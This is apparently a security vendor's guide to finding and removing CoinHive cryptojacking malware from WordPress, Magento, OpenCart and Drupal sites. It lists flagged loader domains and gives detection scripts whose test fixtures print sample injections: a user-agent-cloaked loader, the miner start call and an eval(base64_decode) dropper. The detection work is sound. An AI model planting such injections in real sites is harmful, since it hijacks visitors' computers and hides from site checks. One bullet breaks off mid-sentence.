
Removing Cryptojacking CoinHive Malware from your WordPress, Magento, Drupal & Prestashop websites

Updated on: May 4, 2020

What is crypto mining malware (the CoinHive JavaScript miner)? How are you affected?

CoinHive is an online service that provides a cryptocurrency miner written in JavaScript, which a site owner can embed in their web pages. The miner runs in the browser of every visitor and mines Monero. It is promoted as an alternative to placing advertising on a website. In practice it is also used by attackers as malware: they compromise a website, inject the miner into it, and thereby hijack the CPU of everyone who visits the site.

To mine Monero with CoinHive, all a site owner has to do is place a small JavaScript snippet in the header or footer of the site. When a visitor loads a page, the CoinHive script starts and consumes whatever CPU power is available to it. With 10–20 active miners on the site, the average monthly revenue is about 0.3 XMR (~$109 at the time of writing). To multiply that revenue, attackers have been exploiting vulnerable websites and injecting the CoinHive miner (the crypto mining malware) into them.

While CoinHive itself is not a malicious service, it has been extensively used by hackers to mine coins on hacked websites. As a result, many malware scanners and security vendors have blacklisted its domain.

Flagged Domains Hosting the Crypto Mining Code

We have compiled a list of third-party domains that have been seen hosting the CoinHive loader used by the malware. The script names are deliberately chosen to look like common, legitimate file names (status.js, theme.js, jqueryui.js) so that a webmaster does not get suspicious on seeing them.

  • ads.locationforexpert[.]com
  • camillesanz[.]com/lib/status.js
  • security.fblaster[.]com
  • fricangrey[.]top/redirect_base/redirect.js
  • alemoney[.]xyz/js/stat.js
  • africangirl[.]top/redirect_base/redirect.js
  • ribinski[.]us/redirect_base/redirect.js
  • aleinvest[.]xyz/js/theme.js
  • babybabybabyoooh[.]net/beta.js
  • www.threadpaints[.]com/js/status.js
  • oneyoungcome[.]com/jqueryui.js
  • wp-cloud[.]ru
  • doubleclick1[.]xyz
  • doubleclick2[.]xyz
  • doubleclick3[.]xyz
  • doubleclick4[.]xyz
  • doubleclick5[.]xyz
  • doubleclick6[.]xyz
  • api[.]l33tsite[.]info
  • ws[.]l33tsite[.]info

Finding the crypto mining malware (CoinHive)

If your website has been running crypto-mining scripts without your knowledge, it is very likely that the website has been hacked. Here are some steps you can take to confirm the infection:

  1. Open the website in your web browser and select the “View Source” option.
  2. In the page source, look for JavaScript that looks suspicious:
    1. Any of the flagged domains listed above
    2. Unrecognized domains or file names
    3. The CoinHive initialization code: a script tag that loads coinhive.min.js from coinhive.com, followed by a call such as new CoinHive.Anonymous('<site key>') and miner.start()

(Screenshot: the CoinHive initialization code as it appears in the source of an infected page)
  3. Also look for malware code in the core website files on your server. If you are an Astra customer, start a Malware Scan from your Dashboard. If not, you can perform the following steps over SSH:
    1. List recently modified files, newest first (the -printf option needs GNU find):
      find /path-of-www -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
    2. Search for common malware strings:
      find /var/www -name "*.php" -exec grep -l "eval(" {} \;
      Replace the search string (eval( above) with each of the strings listed below and run the command again:

      1. echo(gzinflate(base64_decode
      2. coinhive (the crypto-jacking code itself)
      3. locationforexpert
      4. base64_decode
      5. gzinflate(base64_decode
      6. eval(base64_decode
    3. Open the files flagged by these searches and inspect the matching lines. Note that eval( and base64_decode are also used by legitimate CMS and plugin code, so treat a hit as a lead to verify against a clean copy of the file, not as proof of infection.
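The find/grep steps above, combined into one script as an added example (this is not code from the original article or from Astra): it lists recently changed files and then sweeps every PHP, JS and template file under a web root for the indicator strings and the flagged domains listed earlier. It assumes GNU findutils and grep. The web root it scans in the demo is constructed inline (the injected theme files and the placeholder CoinHive site key are made up), so it runs offline; point scan_webroot at a real document root to use it.

```shell
#!/usr/bin/env bash
# Added example (not the article's own code): sweep a web root for the
# cryptojacking indicators listed in the article. Assumes GNU find/grep.
set -u

# Server-side strings from the article. eval( and base64_decode are also
# used by legitimate CMS/plugin code, so every hit is a lead, not a verdict.
SUSPECT_STRINGS='echo(gzinflate(base64_decode
coinhive
locationforexpert
base64_decode
gzinflate(base64_decode
eval(base64_decode
eval('

# Flagged loader domains from the article's list, with the [.] defanging
# removed so they match what actually sits in an injected <script src=...>.
FLAGGED_DOMAINS='ads.locationforexpert.com
camillesanz.com
security.fblaster.com
fricangrey.top
alemoney.xyz
africangirl.top
ribinski.us
aleinvest.xyz
babybabybabyoooh.net
threadpaints.com
oneyoungcome.com
wp-cloud.ru
doubleclick1.xyz
doubleclick2.xyz
doubleclick3.xyz
doubleclick4.xyz
doubleclick5.xyz
doubleclick6.xyz
l33tsite.info'

# recent_files ROOT DAYS: files changed in the last DAYS days, newest first
# (the article's find -printf listing, restricted with -mtime; GNU find only).
recent_files() {
  find "$1" -type f -mtime "-$2" -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
}

# grep_files -- PATTERN ROOT: files under ROOT containing the fixed string
# PATTERN (case-insensitive), limited to the file types attackers modify.
grep_files() {
  grep -rliF --include='*.php' --include='*.js' --include='*.html' \
       --include='*.tpl' --include='*.twig' "$@"
}

# scan_webroot ROOT: print "<kind>\t<file>\t<indicator>" for every hit.
scan_webroot() {
  root=$1
  {
    printf '%s\n' "$SUSPECT_STRINGS" | while IFS= read -r s; do
      grep_files -- "$s" "$root" | while IFS= read -r f; do
        printf 'string\t%s\t%s\n' "$f" "$s"
      done
    done
    printf '%s\n' "$FLAGGED_DOMAINS" | while IFS= read -r d; do
      grep_files -- "$d" "$root" | while IFS= read -r f; do
        printf 'domain\t%s\t%s\n' "$f" "$d"
      done
    done
  } | sort -u
}

# make_fixture: constructed WordPress-like tree in a temp dir (not a real
# infection): a clean index.php, a theme header that hides an injected
# loader from search-engine crawlers, a theme footer with the CoinHive
# initialisation call (SITE_KEY is a placeholder) and an obfuscated dropper.
make_fixture() {
  dir=$(mktemp -d)
  mkdir -p "$dir/wp-content/themes/demo" "$dir/wp-includes"
  printf '<?php echo "hello"; ?>\n' > "$dir/index.php"
  cat > "$dir/wp-content/themes/demo/header.php" <<'EOF'
<?php
if (!preg_match('/googlebot|bingbot|slurp/i', $_SERVER['HTTP_USER_AGENT'])) {
  echo '<script src="https://ads.locationforexpert.com/x.js"></script>';
}
?>
EOF
  cat > "$dir/wp-content/themes/demo/footer.php" <<'EOF'
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY'); miner.start();</script>
EOF
  printf '<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n' \
    > "$dir/wp-includes/manifest.php"
  printf '%s\n' "$dir"
}

# Stand-alone demo: scan the constructed tree, then remove it.
demo_root=$(make_fixture)
echo "== files changed in the last day"
recent_files "$demo_root" 1
echo "== indicator hits (kind, file, indicator)"
scan_webroot "$demo_root"
rm -rf "$demo_root"
```

The output is one line per file and indicator, so a file that trips several patterns (the dropper matches eval(, base64_decode and eval(base64_decode) shows up several times; sort the list by file and start with the ones that also appear in the recent_files listing.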
  Fixing Crypto Mining CoinHive Malware in WordPress

    We have seen core WordPress files modified to hold the malware code. In many cases the theme files have also been hijacked to carry the JavaScript crypto mining code. The malware checks the User-Agent of each request and only includes the malicious JS when the visitor is not a search engine bot from Google, Bing, Yahoo etc., so the injection stays invisible to crawlers and to site checks that identify themselves as crawlers.

    (Screenshot: malicious code injected into the header.php file of a WordPress theme)
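A check for the user-agent cloaking just described, as an added example that is not the article's own code: fetch the same page once as a search-engine crawler and once as a browser, then report the script sources that only the browser receives. It assumes curl, grep with -o, and comm; the two HTML responses in the demo are constructed inline so the comparison runs offline, and check_url does the live fetch against a real URL.

```shell
#!/usr/bin/env bash
# Added example (not the article's own code): expose user-agent cloaking by
# diffing the <script src=...> set served to a crawler against the set served
# to a browser. Assumes curl, grep -o and comm.
set -u

BOT_UA='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
BROWSER_UA='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'

# script_srcs: read HTML on stdin, print each <script> src, sorted and unique.
script_srcs() {
  tr -d '\n' | grep -oiE '<script[^>]*>' | grep -oiE "src=[\"'][^\"']+" \
    | cut -c6- | sort -u
}

# cloaked_srcs BOT_HTML BROWSER_HTML: script sources present only in the
# browser's copy of the page, i.e. withheld from the crawler.
cloaked_srcs() {
  bot=$(mktemp); usr=$(mktemp)
  printf '%s' "$1" | script_srcs > "$bot"
  printf '%s' "$2" | script_srcs > "$usr"
  comm -13 "$bot" "$usr"
  rm -f "$bot" "$usr"
}

# fetch_as URL UA: fetch a page with the given User-Agent, bypassing caches.
fetch_as() {
  curl -sSL -A "$2" -H 'Cache-Control: no-cache' -- "$1"
}

# check_url URL: live comparison against a real site (needs network access).
check_url() {
  cloaked_srcs "$(fetch_as "$1" "$BOT_UA")" "$(fetch_as "$1" "$BROWSER_UA")"
}

# Constructed responses standing in for fetch_as output from an infected
# site: the crawler gets only the theme's own jQuery, the browser also gets
# two injected loaders (domains taken from the flagged list above).
BOT_VIEW='<html><head><script src="/wp-includes/js/jquery/jquery.js"></script></head><body>Hello</body></html>'
BROWSER_VIEW=$(cat <<'EOF'
<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://ads.locationforexpert.com/x.js"></script>
<script type="text/javascript" src='https://alemoney.xyz/js/stat.js'></script>
</head><body>Hello</body></html>
EOF
)

echo "== script sources served to the browser but not to the crawler"
cloaked_srcs "$BOT_VIEW" "$BROWSER_VIEW"
```

Run check_url against your own site URL to do the live comparison. An empty result does not prove the site clean: injected code can also key on the client IP, referrer or a cookie, and the inline miner.start() snippet has no src at all, so pair this with the file and source inspection above.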

    Some of the files you should check and compare against a clean copy for modifications:

    • index.php
    • wp-admin/admin-header.php
    • wp-includes/general-template.php
    • wp-includes/default-filters.php
    • wp-includes/manifest.php
    • header.php in your theme folder (look for unrecognized code)
    • functions.php in your theme folder

    See also: commonly hacked WordPress files and how to fix them.

    Fixing Crypto Mining CoinHive Malware in Magento

    If you are using Magento, also look for the crypto mining code in the database. Open the core_config_data table with a tool like phpMyAdmin and inspect the value stored for the path design/head/includes. Examine that value and remove any JavaScript files being pulled in there through <script> tags.

    Also check the copyright text in the footer to make sure no additional malicious code has been added there. Navigate to System -> Configuration -> Design -> Footer -> Copyright and examine the value.

    Don’t forget to clear all your Magento caches after removing any malicious code, otherwise the cached pages keep serving the miner.

    Fixing the Crypto Malware (CoinHive) Hack in OpenCart

    Some of the files commonly infected in OpenCart are listed below. The cleanup steps are the same as for WordPress: check the integrity of these files by comparing them with the original OpenCart code for your version.

    • index.php
    • catalog/view/theme/default/template/common/header.tpl
    • catalog/view/theme/default/template/common/header.twig

    Fixing CoinHive Malware in Drupal

    For Drupal sites, look at the .js files of installed modules. We found the crypto mining code in the Google Analytics module:

    • sites/all/modules/google_analytics/googleanalytics.js

    The CoinHive code was appended to this file, directly after the Google Analytics code, so every page that loaded the module's script started mining in the visitor's browser.

    Cryptomining Malware CoinHive in Database

    Hackers also inject the CoinHive crypto mining code into the website's database, in rows whose content is rendered into pages. Here is a screenshot of such code.

    (Screenshot: CoinHive malware stored in the database of a WordPress/Magento/OpenCart/Drupal site)
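    One way to do the database check described for Magento above, and to find stored injections in general, as an added example that is not the article's own code: dump the database and sweep the dump for <script> tags embedded in row values. That catches the core_config_data rows named above as well as injected content in any other table. It assumes a dump produced with mysqldump --skip-extended-insert (one row per INSERT line) and grep/sed with -E; the dump it scans here is a constructed four-row sample.

```shell
#!/usr/bin/env bash
# Added example (not the article's own code): find <script> tags stored in
# database rows by sweeping a SQL dump. Assumes mysqldump --skip-extended-insert
# output (one INSERT per line) and grep/sed with -E.
set -u

# db_script_tags DUMP: print "<table>\t<tag>" for every <script ...> opening
# tag inside an INSERT row. mysqldump escapes quotes in values as \", so the
# tag is reported as it appears in the dump rather than parsed further.
db_script_tags() {
  grep -i '^INSERT INTO' "$1" | grep -i '<script' | while IFS= read -r row; do
    table=$(printf '%s' "$row" | sed -E 's/^INSERT INTO `?([^` ]+)`?.*/\1/')
    printf '%s' "$row" | grep -oiE '<script[^>]*>' | while IFS= read -r tag; do
      printf '%s\t%s\n' "$table" "$tag"
    done
  done
}

# make_dump: write a constructed four-row dump to a temp file (not a real
# site): a Magento design/head/includes row carrying an injected loader, a
# clean footer copyright row, a clean WordPress option, and a post whose
# content was seeded with a second loader from the flagged list.
make_dump() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
-- constructed sample dump
INSERT INTO `core_config_data` VALUES (1,'default',0,'design/head/includes','<script type=\"text/javascript\" src=\"https://alemoney.xyz/js/stat.js\"></script>');
INSERT INTO `core_config_data` VALUES (2,'default',0,'design/footer/copyright','&copy; 2020 Example Store');
INSERT INTO `wp_options` VALUES (3,'blogname','Example Blog','yes');
INSERT INTO `wp_posts` VALUES (4,'Hello world','<p>Welcome.</p><script src=\"https://camillesanz.com/lib/status.js\"></script>','publish');
EOF
  printf '%s\n' "$f"
}

# Stand-alone demo: scan the constructed dump, then remove it.
demo_dump=$(make_dump)
echo "== script tags stored in database rows (table, tag)"
db_script_tags "$demo_dump"
rm -f "$demo_dump"
```

    Produce the dump with mysqldump --skip-extended-insert -u USER -p DBNAME > site.sql and run db_script_tags site.sql. Legitimate content can contain script tags too (an embedded widget in a post, for instance), so review each hit; a src pointing at one of the flagged domains above, or a tag in a configuration table such as core_config_data, is what to remove.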

    Preventing Cryptojacking Malware (CoinHive) Hack

    • Perform regular file integrity monitoring: Use a tool like Astra to monitor the files on your server and alert you when they change. Attackers modify files on the server to plant malware in the core files of your website. Such code can run server-side (PHP, Python, etc.) or in the visitor's browser (JavaScript).
    • Only include JavaScript files from trusted sources and CDNs: Be careful before you include third-party JS files in your website. JavaScript is a very powerful tool and
    • Create a Content Security Policy (CSP): CSP is a browser security standard that restricts where a page may load scripts and other resources from, which blunts code injection attacks such as cross-site scripting (XSS) and clickjacking. A script-src directive that allows only your own origin and the CDNs you actually use would have stopped browsers from loading the injected loaders from the flagged domains above, and it also blocks the inline miner.start() snippet as long as 'unsafe-inline' is not permitted. Read Google's guide on the fundamentals of CSP and how to set one up.
    • Regularly update your CMS: Security fixes ship with new CMS versions. Check for new releases routinely and upgrade.
    • Install ALL security patches released by vendors: Almost all CMSs release security patches as critical issues are reported. Subscribe to their security mailing lists or RSS feeds and keep your software up to date.

    Conclusion

    CoinHive itself is not a malicious service, but it has been extensively used by hackers to mine Monero on hacked websites. To curb such unauthorized use, CoinHive released a new ‘AuthedMine’ version of its JavaScript library that requires explicit consent from the site visitor before mining begins. However, the older version is still out there, letting hackers mine coins at the expense of unsuspecting visitors and the owners of hacked sites.

    As an online business owner, your website is the center of your business and needs continuous security monitoring to keep running smoothly. We’re happy to help you keep your website secure and malware free.

    See also our blog post on how the RawGit CDN was abused by CryptoLoot cryptominers.

    How does Astra protect you from CoinHive and other malware attacks?

    At Astra, we have a team of security experts who resolve several crypto malware infections every day and make sure they do not come back. Our web application firewall protects your website in real time from malware, XSS, SQL injection and 80+ other threats. Every request to your website is scanned by our security engine and only legitimate requests are passed through.

    Ananda Krishna

    Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France). At Astra he's building an intelligent security ecosystem: web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cybersecurity community and has shared his knowledge at various forums & invited talks.
    Comments

    energyresourcing
    1 year ago

    Nice Blog! I liked it. Thanks for sharing it.

    John
    1 year ago

    Good information. Coinhive is still a pain in the ass. Hackers are exploiting CMS systems around the world for this.
